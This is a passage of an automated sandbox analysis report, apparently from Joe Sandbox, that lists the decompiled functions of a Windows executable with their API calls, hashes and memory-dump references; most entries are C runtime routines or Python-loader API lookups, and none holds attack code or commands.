                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                      • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction ID: 7c911afd9b13035e3bb5ab13be8b67c065dd9d35f6a1949ead0e784c2689afca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E3A1B18AC281DB24AB25A8441A9E761FB45BF4F944331EE7E4B7E9CF7CD0118790
                                                                                                                                                                                                      Function 00007FF7FF59A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                      • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction ID: 8def72dcd44552952c8c5b4efc295f34883e1e8278225513b2ff387a4d26758e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE04F10E0968252FF287BF294951B996506F85740B854230C83D832E2DE2C689582F0
                                                                                                                                                                                                      Function 00007FF7FF59ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC36
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC40
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                      • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction ID: 71b7341e872857e837700a200d64cfe775ea603b681a6c97d05e0d0b5d33e6f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21A411B1C6C241EFB877A194902F9A2829F84790FD84375E93E4B7D2CE6CE44583F0
                                                                                                                                                                                                      Function 00007FF7FF59BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction ID: 86453121177c381cf5bc730092f354509d3598680ca3531b394511a52951a636
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41D73290868687FB38AB16A5442BDB7A4EB55B44F901331D6BE436D1CF2DE502CBF1
                                                                                                                                                                                                      Function 00007FF7FF587F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                      • Opcode ID: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
                                                                                                                                                                                                      • Instruction ID: 0ef530b5c66d8333b0de49c4743448113597bf5d41f0ae2a2c35713b507af1c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7219E21B486D285EB64BA2269043FAEA51FF45BD4FC85530EE3D0B7C6CE3DE045C6A4
                                                                                                                                                                                                      Function 00007FF7FF59B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                      • Instruction ID: 4db6ddd0342bbc456bf5ac2bef59305e82959790f2699d77c2fcfc09f1e02d68
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC319C31A186C695F7697B5588813FCA660AB40B94FC64335E93D033E2CFBCE94187B0
                                                                                                                                                                                                      Function 00007FF7FF5999D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                      • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                      • Instruction ID: 77e3f25fc3631df90c6934c1dd0cc6b5953e21149806ae3f2f42af8d86b9aa42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23218E72A057828AEB28AF64C4442EC77A5FB44718F841739D63D07AD5DF38D984C7A0
                                                                                                                                                                                                      Function 00007FF7FF596004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                      • Instruction ID: ea438a866be39f56569a56d08e4e1f71a6e21f40d625983e6fb0b0e994b4ef63
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81113062A1868241EB78BF5194002FEE2A4AF45F90FC44231EB7C57AD6DF3DD45187E1
                                                                                                                                                                                                      Function 00007FF7FF5A63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                      • Instruction ID: ccb0a3abd6f52daee80d05edc2e95a7ced09e41fb20fb9d32e20ce6d93c1a481
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9221D772608AC286D760AF18D4803B9B6A0FB84F54F944335E6BE876D5DF3CD4118B50
                                                                                                                                                                                                      Function 00007FF7FF59042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                      • Instruction ID: 500166a5650fe92580b8071ade264c7eb2e3d94f3392d6ef0fedb682d5cb0fdf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1401A521A08B8141EB28EF6259010A9E695BF86FE0F884B31DE7C57BD6CE3CE4114350
                                                                                                                                                                                                      Function 00007FF7FF59D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7FF590D00,?,?,?,00007FF7FF59236A,?,?,?,?,?,00007FF7FF593B59), ref: 00007FF7FF59D6AA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                      • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction ID: 2873f2212832c7c6d3179c13600a18cdd484f53727a6a91f3405df183929c501
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F03415E0D28645FF787A7198516F992904F95BA0F884330997E873D2EE2CA48082B0

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FF7FF585820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585830
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585842
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585879
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58588B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858A4
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858B6
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858CF
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858E1
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858FD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58590F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58592B
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58593D
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585959
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58596B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585987
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585999
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859B5
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859C7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                      • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction ID: bd9b1a2efc8007b7e2a5e0ca7d31ad65ae96febdde4dc04b6c5a29345f16109f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC228164A0AB8791FB15BB65A8141F4A7A0BF05B55FD55236C83E032E0FF3CA568C2F0
                                                                                                                                                                                                      Function 00007FF7FF5A411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                                                      • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
